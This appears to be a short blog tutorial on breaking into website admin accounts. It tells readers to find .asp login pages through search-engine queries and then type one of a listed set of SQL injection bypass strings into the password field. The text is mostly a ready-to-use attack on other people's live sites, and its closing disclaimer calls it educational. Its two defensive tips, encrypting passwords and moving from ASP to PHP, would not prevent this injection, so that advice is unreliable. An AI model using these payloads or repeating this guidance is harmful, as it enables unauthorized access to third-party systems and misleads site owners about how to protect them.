Hacking a Website/Admin account using SQL injection.

Hello, The big problem with SQL is its poor security issues surrounding is url strings and the login.

It is the easy way of getting into an administration area of a website that has .asp at the end of it, we going to use SQL injection for this.
Go to google or any Search Engine and puch in one of these words: adminlogin.asp - login asp - admin area - admin/logon.asp - admin/adminlogin.asp - admin/adminlogon.asp - admin/admin_login.asp - admin/admin_logon.asp - administrator/admin.asp - administrator/login.asp - administrator/logon.asp - root/login.asp - admin/index.asp - admin.asp - login.asp - logon.asp - adminlogin.asp - adminlogon.asp - admin_login.asp - admin_logon.asp - admin/admin.asp - admin/login.asp .................

Now you get a website ending with adminlogin.asp ,enter it.

Username :

Password :

So what we do here is in the USERNAME, we always type “Admin” as the username and for our PASSWORD we type our sql injection.

Here is a list of sql injections..
‘ or ’1′=’1

‘ or ‘x’=’x

‘ or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

‘or’1=1′

TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know.

what this sql injection is doing :

Confusing the database till it gives you authentication bypass. So your input should look like this


username: Admin

password: ’or’1′=’1

So click submit and you’re in. . Wow.

NOTE not all sites are vulnerable.

HOW TO SECURE YOUR SITE FROM THIS ATTACK

1- Put encryption on the passwords.

2- Change the platform of your website from asp to php.

Disclaimer

:::am using this as a tutorial for educative aspect and not for crime. . . So be careful.